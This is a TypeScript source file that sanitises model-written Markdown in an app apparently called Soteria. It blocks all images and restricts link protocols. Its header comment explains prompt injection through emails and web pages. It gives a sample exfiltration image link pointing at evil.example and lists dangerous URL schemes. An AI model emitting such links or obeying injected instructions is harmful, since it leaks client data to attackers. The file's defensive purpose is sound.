// What a model-written Markdown reply is allowed to make the browser do.
//
// The text Soteria renders is not authored by us. It is a model's output, and
// the model reads client emails, uploaded documents and web pages, any of which
// can carry instructions. An image whose URL embeds something the model saw
// (`![](https://evil.example/p.gif?d=<client data>)`) is fetched by the browser
// the moment the reply paints, with no click: that is a tracking pixel and a
// data-exfiltration channel in one. So:
//
//   - IMAGES ARE NEVER LOADED. Not remote, not `data:`, not relative. The alt
//     text is shown instead so the sentence still reads.
//   - LINKS carry only an allowed protocol (http, https, mailto, tel). Anything
//     else (`javascript:`, `data:`, `vbscript:`, `file:`, relative paths) loses
//     its href and renders as plain text.
//   - Links open in a new tab with `noopener noreferrer`, so the destination
//     cannot reach back through `window.opener` and is not told where the
//     reader came from.

const ALLOWED_LINK_PROTOCOLS = new Set(['http:', 'https:', 'mailto:', 'tel:']);

/**
 * The URL if it is a link we are willing to render, else `''`.
 *
 * Parsed rather than pattern-matched: the URL parser removes the tabs and
 * newlines browsers ignore and lower-cases the scheme, so `JaVa\nScRiPt:` is
 * seen as `javascript:` here exactly as the browser would see it.
 */
export function safeLinkUrl(url: string | null | undefined): string {
  if (!url) return '';
  try {
    const parsed = new URL(url.trim());
    return ALLOWED_LINK_PROTOCOLS.has(parsed.protocol) ? url.trim() : '';
  } catch {
    // Relative or malformed: nothing sensible to open from model text.
    return '';
  }
}

/** react-markdown `urlTransform`. Images never reach it with a usable URL. */
export function markdownUrlTransform(
  url: string,
  key: string,
): string | undefined {
  if (key === 'src') return undefined;
  return safeLinkUrl(url);
}

export const LINK_REL = 'noopener noreferrer';
